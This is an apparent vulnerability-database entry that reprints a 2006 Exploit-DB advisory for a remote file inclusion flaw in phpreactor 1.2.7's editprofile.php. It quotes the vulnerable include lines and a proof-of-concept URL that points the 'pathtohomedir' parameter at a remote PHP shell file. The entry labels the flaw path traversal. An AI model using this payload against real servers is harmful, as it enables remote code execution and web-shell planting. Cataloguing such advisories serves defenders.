phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability

vendor:

phpreactor

by:

CeNGiZ-HaN

7,5

CVSS

HIGH

Path Traversal

CWE

Product Name: phpreactor

Affected Version From: 1.2.7

Affected Version To: 1.2.7

Patch Exists: YES

Related CWE: N/A

CPE: a:phpreactor:phpreactor:1.2.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'pathtohomedir' parameter to '/editprofile.php'. A remote attacker can include arbitrary files from remote hosts and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent path traversal attacks.

Source

Exploit-DB raw data:

###########################    www.system-defacers.org         ###############
#    Found By CeNGiZ-HaN cengiz-han@system-defacers.org
#    phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################
#    Vulnerable Code in editprofile.php
#      //INCLUDE DB FUNCTIONS
#   if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
#   //INCLUDE LANGUAGE FUNCTIONS
#   if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
#   //INCLUDE USERS FUNCTIONS
#   if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
#   //INCLUDE BBS FUNCTIONS
#   if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
#
#
#              http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
#
##############################################################################
#
#        W W W . S Y S T E M - D E F A C E R S . O R G
#
##############################################################################

# milw0rm.com [2006-07-31]